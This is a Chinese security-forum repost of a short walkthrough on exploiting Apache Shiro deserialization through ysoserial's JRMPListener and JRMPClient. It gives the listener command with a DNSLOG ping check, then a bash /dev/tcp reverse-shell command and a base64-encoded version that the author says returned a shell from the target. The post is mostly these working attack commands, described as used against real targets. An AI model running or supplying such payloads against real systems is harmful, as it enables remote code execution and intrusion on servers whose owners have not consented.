安全矩阵

 找回密码
 立即注册
搜索
查看: 841|回复: 0

shiro反序列漏洞中JRMPClient利用

[复制链接]

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2022-11-23 10:20:06 | 显示全部楼层 |阅读模式
本帖最后由 wangqiang 于 2022-11-23 10:22 编辑

shiro反序列漏洞中JRMPClient利用
原创 xxlm Tide安全团队 2022-11-22 17:03 发表于湖南
转载自:shiro反序列漏洞中JRMPClient利用

前言
最近在测试中遇到一些shiro反序列化不能利用的情况 找到key 无法找到利用链,但是发现存在JRMPClient可用的情况
换一种工具尝试
发现 JRMPClient 可用, 尝试使用 JRMPClient 进行测试,最终这个目标也没有执行成功所以换了一个目标进行的尝试,仅记录JRMPClient 利用方式。

使用JRMPClient模块进行测试
找到一个同样存在shiro反序列的目标。
同样find: JRMPClient can be use。

搭建JRMPClient 监听服务
首先需要搭建 JRMPClient 使用ysoserial.jar 工具搭建服务,下载地址:https://github.com/frohoff/ysoserial

使用DNSLOG进行检测
在不确定目标是否通外网的情况下 先使用DNSLOG进行检测 获取一个新的域名 :w3dh1h.dnslog.cn

VPS上开启JRMPListener
在VPS上搭建服务命令
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "ping w3dh1h.dnslog.cn"

shiro反序列利用工具中选择JRMPClient,然后输入VPS上搭建服务的地址:

JRMPListener 收到返回信息

DNSLOG上收到目标的ping 命令信息 说明目标服务器通外网

执行反弹命令
执行反弹命令 bash -i >& /dev/tcp/xxxxxx/8888 0>&1

没有收到反弹链接

将命令进行base64编码
  1. java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eHgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"
复制代码


成功收到反弹链接

END





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 06:38 , Processed in 0.012547 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表